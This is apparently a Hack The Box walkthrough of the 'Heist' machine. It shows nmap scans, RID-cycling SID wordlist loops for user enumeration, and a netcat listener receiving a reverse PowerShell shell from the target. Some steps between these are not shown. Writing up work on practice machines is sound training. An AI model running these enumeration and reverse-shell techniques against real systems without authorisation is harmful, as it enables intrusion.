┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ nmap -p1-10000 $ip -Pn -n --disable-arp-ping -vv --min-rate 10000
PORT STATE SERVICE REASON
80/tcp open http syn-ack
135/tcp open msrpc syn-ack
445/tcp open microsoft-ds syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ nmap -p80,135,445,5985 $ip -sCV -oN Nmap/script-scan
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-07-06T23:55:49
|_ start_date: N/A
We can see that SMB enumeration failed, switching to RPC, but also failed
RPC
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ rpcclient -U "%" $ip
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
HTTP
web page at http://10.10.10.149/login.php
I tried to supply default credentials, but the login button didn't send any request to the backend server, However Login as guest took my attention and click it
It took me to http://10.10.10.149/issues.php as shown above.
From this page I could extract some useful information:
usernames: Hazard, Support Admin
Attachment: http://10.10.10.149/attachments/config.txt
http://10.10.10.149/attachments/config.txt
If you configured Cisco router before, you would be familiar with this syntax and commands. We can extract additional information:
No options available now for me except enumerating RPC with hazard credentials. I tried several commands to enumerate the machine but these only two worked
So, the domain SID is S-1-5-21-4254423774-1266059056-3197185112 and RID is added to the end I wanted to enumerate users on the machine but enumdomuers failed, however lookupnames & lookupsids can be used for that purpose.
The user SID contain two parts:
SID of the domain
RID of the user
I knew from previous experience that RID count starts with 500 which is the administrator RID and regular users start for 1000, So I will generate a wordlist {500:510} for admins accounts & {1000:1100} for regular users.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ for rid in {500..510};do echo "S-1-5-21-4254423774-1266059056-3197185112-$rid" >> sids.txt;done
for rid in {1000..1100};do echo "S-1-5-21-4254423774-1266059056-3197185112-$rid" >> sids1.txt;done
Loop with the two wordlists and redirect the output to results.txt and then read the files
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.25] from (UNKNOWN) [10.10.10.149] 49716
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Tools>
I didn't find many interesting things since I landed as Chase, So I run Winpeas.exe and it highlighted these files as read:
